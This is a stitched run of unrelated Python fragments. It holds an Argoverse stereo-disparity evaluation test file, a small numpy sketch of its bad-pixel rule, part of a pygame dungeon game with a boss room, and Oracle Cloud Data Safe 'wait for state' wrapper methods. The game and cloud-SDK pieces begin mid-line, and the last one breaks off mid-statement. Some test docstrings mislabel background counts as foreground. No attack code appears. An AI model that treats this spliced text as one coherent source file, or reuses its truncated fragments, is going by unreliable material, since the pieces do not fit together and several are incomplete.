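    # with this toy data the result is expected to be ["a", "c"].
    return kept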
<reponame>gargrohin/argoverse-api<filename>tests/test_eval_stereo.py<gh_stars>100-1000 # <Copyright 2021, Argo AI, LLC. Released under the MIT license.> """Stereo evaluation unit tests.""" import math from pathlib import Path from argoverse.evaluation.stereo.constants import DEFAULT_ABS_ERROR_THRESHOLDS, DEFAULT_REL_ERROR_THRESHOLDS from argoverse.evaluation.stereo.eval import StereoEvaluator from argoverse.evaluation.stereo.utils import compute_disparity_error _ROOT = Path(__file__).resolve().parent def test_stereo_evaluation() -> None: """Test the stereo evaluation using real predictions and known results.""" pred_dir = Path(f"{_ROOT}/test_data/stereo/prediction/") gt_dir = Path(f"{_ROOT}/test_data/stereo/disparity_maps_v1.1/test/") evaluator = StereoEvaluator( pred_dir, gt_dir, figs_fpath=None, save_disparity_error_image=False, num_procs=1, ) summary = evaluator.evaluate() assert math.isclose(summary["all:10"], 5.446183637) assert math.isclose(summary["fg:10"], 9.600825877) assert math.isclose(summary["bg:10"], 3.556616323) assert math.isclose(summary["all*:10"], 3.811615737) assert math.isclose(summary["fg*:10"], 7.697195243) assert math.isclose(summary["bg*:10"], 1.664911488) assert math.isclose(summary["all:5"], 21.389381959) assert math.isclose(summary["fg:5"], 16.070199587) assert math.isclose(summary["bg:5"], 23.808592221) assert math.isclose(summary["all*:5"], 17.171651915) assert math.isclose(summary["fg*:5"], 14.114550240) assert math.isclose(summary["bg*:5"], 18.860638884) assert math.isclose(summary["all:3"], 29.672960034) assert math.isclose(summary["fg:3"], 18.530626290) assert math.isclose(summary["bg:3"], 34.740590030) assert math.isclose(summary["all*:3"], 24.646294980) assert math.isclose(summary["fg*:3"], 16.61069256) assert math.isclose(summary["bg*:3"], 29.08580311) def test_compute_disparity_error_dummy_1() -> None: """Test the computation of the disparity errors using an exact disparity prediction for background regions only. The computed values are the following: num_pixels_bg: Number of pixels in the background region. num_pixels_fg: Number of pixels in the foreground region. num_pixels_bg_est: Number of pixels in the background region. Counts only the estimated disparities (no interpolation). num_pixels_fg_est: Number of pixels in the foreground region. Counts only the estimated disparities (no interpolation). num_errors_bg:THD: Counts the number of disparity errors (bad pixels) in the background regions using: bad_pixels = (abs_err > abs_error_thresh) & (rel_err > rel_error_thresh), where abs_err = np.abs(pred_disparity - gt_disparity), rel_err = abs_err / gt_disparity, abs_error_thresh (THD) is one of 10, 5, or 3 pixels, and rel_error_thresh is 0.1 (10%). num_errors_fg:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. num_errors_bg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). num_errors_fg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). 
Dummy test images (3 x 3): pred = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt_obj = np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], dtype=np.float32) pred is the predicted disparity map, gt is the ground-truth disparity map, and gt_obj is the ground-truth disparity map for foreground objects. The dummy data should produce the following results: num_pixels_bg: 9 pixels because the dummy gt disparity map is 3 x 3 and all pixels have valid disparities. num_pixels_fg: 0 pixels because the dummy gt_obj has no foreground objects. num_pixels_bg_est: 9 pixels because the dummy pred disparity map is 3 x 3 and all pixels have valid disparities. num_pixels_fg_est: 0 pixels because the dummy gt_obj has no foreground objects. num_errors_bg:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_fg:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_bg_est:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_fg_est:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). """ gt_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_1/disparity_gt/disparity_1.png") gt_obj_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_1/disparity_gt/disparity_objects_1.png") pred_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_1/disparity_pred/disparity_1.png") errors = compute_disparity_error( pred_fpath, gt_fpath, gt_obj_fpath, figs_fpath=None, abs_error_thresholds=DEFAULT_ABS_ERROR_THRESHOLDS, rel_error_thresholds=DEFAULT_REL_ERROR_THRESHOLDS, save_disparity_error_image=False, ) assert int(errors["num_pixels_bg"]) == 9 assert int(errors["num_pixels_fg"]) == 0 assert int(errors["num_pixels_bg_est"]) == 9 assert int(errors["num_pixels_fg_est"]) == 0 assert int(errors["num_errors_bg:10"]) == 0 assert int(errors["num_errors_fg:10"]) == 0 assert int(errors["num_errors_bg_est:10"]) == 0 assert int(errors["num_errors_fg_est:10"]) == 0 assert int(errors["num_errors_bg:5"]) == 0 assert int(errors["num_errors_fg:5"]) == 0 assert int(errors["num_errors_bg_est:5"]) == 0 assert int(errors["num_errors_fg_est:5"]) == 0 assert int(errors["num_errors_bg:3"]) == 0 assert int(errors["num_errors_fg:3"]) == 0 assert int(errors["num_errors_bg_est:3"]) == 0 assert int(errors["num_errors_fg_est:3"]) == 0 def test_compute_disparity_error_dummy_2() -> None: """Test the computation of the disparity errors using an exact disparity prediction for background and foreground regions. The computed values are the following: num_pixels_bg: Number of pixels in the background region. num_pixels_fg: Number of pixels in the foreground region. num_pixels_bg_est: Number of pixels in the background region. Counts only the estimated disparities (no interpolation). num_pixels_fg_est: Number of pixels in the foreground region. Counts only the estimated disparities (no interpolation). num_errors_bg:THD: Counts the number of disparity errors (bad pixels) in the background regions using: bad_pixels = (abs_err > abs_error_thresh) & (rel_err > rel_error_thresh), where abs_err = np.abs(pred_disparity - gt_disparity), rel_err = abs_err / gt_disparity, abs_error_thresh (THD) is one of 10, 5, or 3 pixels, and rel_error_thresh is 0.1 (10%). 
num_errors_fg:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. num_errors_bg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). num_errors_fg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). Dummy test images (3 x 3): pred = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt_obj = np.array([[ 1.0, 5.0, 0.0], [50.0, 70.0, 0.0], [ 0.0, 0.0, 0.0]], dtype=np.float32) pred is the predicted disparity map, gt is the ground-truth disparity map, and gt_obj is the ground-truth disparity map for foreground objects. The dummy data should produce the following results: num_pixels_bg: 5 pixels in the background because now there are 4 pixels in the foreground region. num_pixels_fg: 4 pixels in the foreground region. num_pixels_bg_est: 5 pixels in the background because now there are 4 pixels in the foreground region. num_pixels_fg_est: 4 pixels in the foreground region. num_errors_bg:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_fg:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_bg_est:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). num_errors_fg_est:THD: 0 errors in all thresholds because the gt=pred (using the equations described earlier). """ gt_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_2/disparity_gt/disparity_1.png") gt_obj_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_2/disparity_gt/disparity_objects_1.png") pred_fpath = Path(f"{_ROOT}/test_data/stereo/eval_test_cases/dummy_case_2/disparity_pred/disparity_1.png") errors = compute_disparity_error( pred_fpath, gt_fpath, gt_obj_fpath, figs_fpath=None, abs_error_thresholds=DEFAULT_ABS_ERROR_THRESHOLDS, rel_error_thresholds=DEFAULT_REL_ERROR_THRESHOLDS, save_disparity_error_image=False, ) assert int(errors["num_pixels_bg"]) == 5 assert int(errors["num_pixels_fg"]) == 4 assert int(errors["num_pixels_bg_est"]) == 5 assert int(errors["num_pixels_fg_est"]) == 4 assert int(errors["num_errors_bg:10"]) == 0 assert int(errors["num_errors_fg:10"]) == 0 assert int(errors["num_errors_bg_est:10"]) == 0 assert int(errors["num_errors_fg_est:10"]) == 0 assert int(errors["num_errors_bg:5"]) == 0 assert int(errors["num_errors_fg:5"]) == 0 assert int(errors["num_errors_bg_est:5"]) == 0 assert int(errors["num_errors_fg_est:5"]) == 0 assert int(errors["num_errors_bg:3"]) == 0 assert int(errors["num_errors_fg:3"]) == 0 assert int(errors["num_errors_bg_est:3"]) == 0 assert int(errors["num_errors_fg_est:3"]) == 0 def test_compute_disparity_error_dummy_3() -> None: """Test the computation of the disparity errors using a non-exact disparity prediction for background regions only. The computed values are the following: num_pixels_bg: Number of pixels in the background region. num_pixels_fg: Number of pixels in the foreground region. num_pixels_bg_est: Number of pixels in the background region. Counts only the estimated disparities (no interpolation). num_pixels_fg_est: Number of pixels in the foreground region. Counts only the estimated disparities (no interpolation). 
num_errors_bg:THD: Counts the number of disparity errors (bad pixels) in the background regions using: bad_pixels = (abs_err > abs_error_thresh) & (rel_err > rel_error_thresh), where abs_err = np.abs(pred_disparity - gt_disparity), rel_err = abs_err / gt_disparity, abs_error_thresh (THD) is one of 10, 5, or 3 pixels, and rel_error_thresh is 0.1 (10%). num_errors_fg:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. num_errors_bg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). num_errors_fg_est:THD: Counts the number of disparity errors (bad pixels) in the foreground regions. Counts only the estimated pixels (no interpolation). Dummy test images (3 x 3): pred = np.array([[ 2.0, 4.0, 10.0], [ 70.0, 60.0, 50.0], [150.0, 120.0, 190.0]], dtype=np.float32) gt = np.array([[ 1.0, 5.0, 10.0], [ 50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32) gt_obj = np.array([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], dtype=np.float32) pred is the predicted disparity map, gt is the ground-truth disparity map, and gt_obj is the ground-truth disparity map for foreground objects. The dummy data should produce the following results: num_pixels_bg: 9 pixels because the dummy gt disparity map is 3 x 3 and all pixels have valid disparities. num_pixels_fg: 0 pixels because the dummy gt_obj has
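# Illustrative sketch (not the argoverse implementation): the bad-pixel rule quoted in the
# docstrings above, bad = (abs_err > abs_error_thresh) & (rel_err > rel_error_thresh),
# applied to the dummy_case_3 pred/gt arrays. Thresholds follow the stated defaults
# (10/5/3 px absolute, 0.1 relative); the real compute_disparity_error additionally
# splits the counts by foreground/background masks and by estimated vs. interpolated pixels.
import numpy as np

def _count_bad_pixels(pred: np.ndarray, gt: np.ndarray, abs_thresh: float, rel_thresh: float = 0.1) -> int:
    abs_err = np.abs(pred - gt)
    rel_err = abs_err / gt
    return int(np.sum((abs_err > abs_thresh) & (rel_err > rel_thresh)))

_pred = np.array([[2.0, 4.0, 10.0], [70.0, 60.0, 50.0], [150.0, 120.0, 190.0]], dtype=np.float32)
_gt = np.array([[1.0, 5.0, 10.0], [50.0, 70.0, 90.0], [100.0, 150.0, 200.0]], dtype=np.float32)
# For this toy data the rule yields 4 bad pixels at the 10 px threshold and 5 at both
# the 5 px and 3 px thresholds.
for _thd in (10, 5, 3):
    print(_thd, _count_bad_pixels(_pred, _gt, _thd))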
self.rect.y == 64 or self.rect.y == (HEIGHT - 256): if self.direction == 1: self.direction = 3 elif self.direction == 2: self.direction = 4 elif self.direction == 3: self.direction = 1 elif self.direction == 4: self.direction = 2 self.timer += 1 else: self.vx, self.vy = 0, 0 if self.wait != 50: self.wait += 1 if self.wait == 25: self.shoot_projectiles() elif self.wait == 49: self.shoot_projectiles() else: self.wait = 0 self.timer = 0 self.playercenter = self.player.getCenter() self.boss_projectiles.update() self.rotatetowardsPlayer() self.random_timer = random.randint(20, 25) self.stimer += self.random_timer # This is where you a able to adjust the # animation time, for the cycles of the pictures. if (self.stimer % 5) == 0: self.index += 1 if self.index >= len(self.imgindex): self.index = 0 self.image = self.imgindex[self.index] def rotatetowardsPlayer(self): self.angle_vec = math.atan2((self.rect.center[0] - self.playercenter[0]),(self.rect.center[1] - self.playercenter[1])) # The angle is converted from radians to degrees self.angle = math.degrees(self.angle_vec) self.newimage = pg.transform.rotate(self.image, self.angle - 180) oldcenter = self.rect.center self.newrect = self.newimage.get_rect() self.newrect.center = oldcenter def shoot_projectiles(self): self.boss_center = self.rect.center self.newproj = Projectile(self.boss_center[0], self.boss_center[1], self.playercenter[0] + 128, self.playercenter[1] + 128, 10, self.screen, 2) self.boss_projectiles.add(self.newproj) # Object added to a group self.newproj = Projectile(self.boss_center[0], self.boss_center[1], self.playercenter[0], self.playercenter[1], 10, self.screen, 2) self.boss_projectiles.add(self.newproj) # Object added to a group self.newproj = Projectile(self.boss_center[0], self.boss_center[1], self.playercenter[0] - 128, self.playercenter[1] - 128, 10, self.screen, 2) self.boss_projectiles.add(self.newproj) # Object added to a group def Boss_AttackCycle(self): if self.direction == 2: self.vx, self.vy = 4, 4 self.vx *= -1 self.vy *= -1 if self.direction == 1: self.vx, self.vy = -4, -4 self.vx *= -1 self.vy *= -1 if self.direction == 3: self.vx, self.vy = -4, 4 self.vx *= -1 self.vy *= -1 if self.direction == 4: self.vx, self.vy = 4, -4 self.vx *= -1 self.vy *= -1 def draw(self): self.percentage = self.health / 1200 xcoord = self.percentage * 512 if self.health != 0: self.boss_projectiles.draw(self.screen) pg.draw.rect(self.screen,(0, 0, 0),[253, 13, 518, 38]) pg.draw.rect(self.screen,(95, 99, 88),[256, 16, 512, 32]) pg.draw.rect(self.screen,(227, 2, 43),[256, 16, xcoord, 32]) try: self.screen.blit(self.newimage, self.newrect) except: self.screen.blit(self.image, self.rect) # Creating an object which inherits from the class Room class BossRoom(Room): def __init__(self, RoomNum, player, screen, direction, prevdirection): # Super allows the parameters to be # taken from the Room class while allowing to # have its own __init__ to add differnt # more specific parameters. 
super().__init__(RoomNum, player, screen, direction, prevdirection) self.boss_group = pg.sprite.Group() self.AddBoss() self.player = player self.boss_dead = False self.winimage = pg.image.load("winscreen.png").convert_alpha() def AddBoss(self): # Add the boss to the room self.Boss = Boss(448, 320, self.player) self.boss_group.add(self.Boss) def update(self, projectile): # Updating the bossroom and the projectile in it super(BossRoom, self).update(projectile) self.collidedwithdoor = self.player.update(self.walls, self.closeddoors, self.closedExitDoors, self.doors, self.ExitDoors, self.enemies, self.items, self.Boss.boss_projectiles, self.boss_group) if self.collidedwithdoor == 1: for projectile in self.proj: projectile.kill() self.player.LoadInto_NewMap(self.doordirection) return 1 if self.collidedwithdoor == 2: for projectile in self.proj: projectile.kill() self.player.LoadInto_OldMap(self.prevdoordirection) return 2 # Check to see if the boss is dead if len(self.boss_group) == 0: self.boss_dead = True def draw(self): # Draw procedure for the boss room super(BossRoom, self).draw() self.screen = maingame.returnGameScreen() if self.boss_dead == True: # Draw the win screen once boss is beaten self.screen.blit(self.winimage, (0,0)) else: self.walls.draw(self.screen) self.Boss.draw() self.screen = maingame.returnGameScreen() class Game: def __init__(self): # initializing the main object pg.init() self.screen = pg.display.set_mode((WIDTH, HEIGHT)) pg.display.set_caption("Dungeon Game") self.clock = pg.time.Clock() self.bg = pg.image.load("back.png").convert_alpha() self.RoomNum = 0 def gameintro(self): # load intro screen self.image = pg.image.load("intropic.png") timer = 0 intro_stage = True while intro_stage == True: for event in pg.event.get(): if event.type == pg.QUIT: self.quitGame() if event.type == pg.MOUSEBUTTONUP: intro_stage = False if timer < 250: self.screen.fill((255,255,255)) if timer == 250: self.screen.fill((209, 209, 209)) if timer == 500: self.screen.fill((161, 161, 161)) if timer == 750: self.screen.fill((112, 112, 112)) if timer >= 1000: self.screen.fill((89, 89, 89)) self.screen.blit(self.image, (32,32)) timer += 1 pg.display.flip() def deathscreen(self): # load death screen self.image = pg.image.load("deathscreen.png") timer = 0 intro_stage = True while intro_stage == True: for event in pg.event.get(): if event.type == pg.QUIT: self.quitGame() if timer < 250: self.screen.fill((255,255,255)) if timer == 250: self.screen.fill((209, 209, 209)) if timer == 500: self.screen.fill((161, 161, 161)) if timer == 750: self.screen.fill((112, 112, 112)) if timer >= 1000: self.screen.fill((89, 89, 89)) self.screen.blit(self.image, (32,32)) timer += 1 pg.display.flip() def CheckforOppositeDoorDirection(self): # checking what the opposite door direction is if self.doordirection == 1: self.doordirection = random.randint(1, 4) if self.doordirection == 2: self.doordirection += 1 elif self.doordirection == 2: self.doordirection = random.randint(1, 4) if self.doordirection == 1: self.doordirection += 1 elif self.doordirection == 3: self.doordirection = random.randint(1, 4) if self.doordirection == 4: self.doordirection -= 2 elif self.doordirection == 4: self.doordirection = random.randint(1, 4) if self.doordirection == 3: self.doordirection -= 2 def CreateNewGame(self): # Creating new sprite groups self.projectiles = pg.sprite.Group() self.player_group = pg.sprite.Group() #Initilizing the player into the game # with coordinates as parameters self.player = PlayerSprite(512, 384) 
self.player_group.add(self.player) self.doordirection = random.randint(1, 4) self.exitdoor2 = self.doordirection # Initializing each room in the game self.Room_0 = Room(self.RoomNum, self.player, self.screen, self.doordirection, 0) self.CheckforOppositeDoorDirection() self.exitdoor3 = self.doordirection self.Room_1 = Room(self.RoomNum + 1, self.player, self.screen,self.doordirection, self.exitdoor2) self.CheckforOppositeDoorDirection() self.exitdoor4 = self.doordirection self.Room_2 = Room(self.RoomNum + 2, self.player, self.screen,self.doordirection, self.exitdoor3) self.CheckforOppositeDoorDirection() self.exitdoor5 = self.doordirection self.Room_3 = Room(self.RoomNum + 3, self.player, self.screen,self.doordirection, self.exitdoor4) self.CheckforOppositeDoorDirection() self.exitdoor6 = self.doordirection self.Room_4 = Room(self.RoomNum + 4, self.player, self.screen,self.doordirection, self.exitdoor5) self.CheckforOppositeDoorDirection() self.Room_5 = BossRoom(self.RoomNum +5, self.player, self.screen,0,self.exitdoor6 ) def returnGameScreen(self): self.screen = self.screen return self.screen # Returns the game's screen def drawBackground(self): self.screen.blit(self.bg, (0,0)) def MainGameLoop(self): self.gameRunning = True # Main Game Loop while self.gameRunning: # Setting the clock tick rate to 60 ticks self.clock.tick(60) self.getEvents() self.update() self.CreateImage() def CreateImage(self): # Drawing sub-section of the main loop self.drawBackground() # Each room has a different object with # different data to keep the # data in that room's required 'data pack' self.projectiles.draw(self.screen) if self.RoomNum == 0: self.Room_0.draw() elif self.RoomNum == 1: self.Room_1.draw() elif self.RoomNum == 2: self.Room_2.draw() elif self.RoomNum == 3: self.Room_3.draw() elif self.RoomNum == 4: self.Room_4.draw() elif self.RoomNum == 5: self.player.draw() self.Room_5.draw() if self.RoomNum != 5: self.player.draw() # Flips the display at the end to change the image pg.display.flip() def AimLine(self): # Testing attribute to visually see the vector # of the player's aim pg.draw.line(self.screen, (0, 0, 0), (self.mousex, self.mousey), (self.PLAYERCENTER)) def DrawGrid(self): # Draws a grid with gives a reference for testing for i in range(0, WIDTH, TILESIZE): pg.draw.line(self.screen, (0, 0, 0), (i, 0), (i, HEIGHT)) for j in range(0, HEIGHT, TILESIZE): pg.draw.line(self.screen, (0, 0, 0), (0, j), (WIDTH, j)) def getEvents(self): self.PLAYERCENTER = self.player.getCenter() self.mousex, self.mousey = pg.mouse.get_pos() for event in pg.event.get(): self.mouse = pg.mouse.get_pressed() if event.type == pg.MOUSEBUTTONUP: if event.button == 1: # Doesn't allow more than 5 projectiles on # screen at once if len(self.projectiles) < 5: # Creates new projectile object self.newproj = Projectile(self.PLAYERCENTER[0], self.PLAYERCENTER[1], self.mousex, self.mousey, 15, self.screen, 1) self.projectiles.add(self.newproj) # Object added to a group # When the top right cross is clicked, the # program closes if event.type == pg.QUIT: self.quitGame() def update(self): # Check to see if the player is dead if self.player.health <= 0: self.gameRunning = False self.projectiles.update() # Update section for all rooms if self.RoomNum == 0: if self.Room_0.update(self.projectiles) == 1: self.RoomNum = 1 elif self.RoomNum == 1: door1 = self.Room_1.update(self.projectiles) if door1 == 1: self.RoomNum = 2 if door1 == 2: self.RoomNum -= 1 elif self.RoomNum == 2: door2 = self.Room_2.update(self.projectiles) if door2 == 1: 
self.RoomNum = 3 if door2 == 2: self.RoomNum -= 1 elif self.RoomNum == 3: door3 = self.Room_3.update(self.projectiles) if door3 == 1: self.RoomNum = 4 if door3 == 2: self.RoomNum -= 1 elif self.RoomNum == 4: door4 = self.Room_4.update(self.projectiles) if door4 == 1: self.RoomNum = 5 if door4 == 2: self.RoomNum -= 1 elif self.RoomNum == 5: if self.Room_5.update(self.projectiles)
getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def resume_audit_trail_and_wait_for_state(self, audit_trail_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.resume_audit_trail` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str audit_trail_id: (required) The OCID of the audit trail. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.resume_audit_trail` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.resume_audit_trail(audit_trail_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def retrieve_audit_policies_and_wait_for_state(self, audit_policy_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.retrieve_audit_policies` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str audit_policy_id: (required) Unique audit policy identifier. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.retrieve_audit_policies` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. 
For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.retrieve_audit_policies(audit_policy_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def set_security_assessment_baseline_and_wait_for_state(self, security_assessment_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.set_security_assessment_baseline` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str security_assessment_id: (required) The OCID of the security assessment. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.set_security_assessment_baseline` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.set_security_assessment_baseline(security_assessment_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def set_user_assessment_baseline_and_wait_for_state(self, user_assessment_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.set_user_assessment_baseline` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str user_assessment_id: (required) The OCID of the user assessment. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.set_user_assessment_baseline` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. 
For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.set_user_assessment_baseline(user_assessment_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def start_audit_trail_and_wait_for_state(self, start_audit_trail_details, audit_trail_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.start_audit_trail` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param oci.data_safe.models.StartAuditTrailDetails start_audit_trail_details: (required) Details for the starting audit. :param str audit_trail_id: (required) The OCID of the audit trail. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.start_audit_trail` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.start_audit_trail(start_audit_trail_details, audit_trail_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def stop_audit_trail_and_wait_for_state(self, audit_trail_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.stop_audit_trail` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str audit_trail_id: (required) The OCID of the audit trail. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.stop_audit_trail` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. 
For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.stop_audit_trail(audit_trail_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def unset_security_assessment_baseline_and_wait_for_state(self, security_assessment_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.unset_security_assessment_baseline` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str security_assessment_id: (required) The OCID of the security assessment. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.unset_security_assessment_baseline` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = 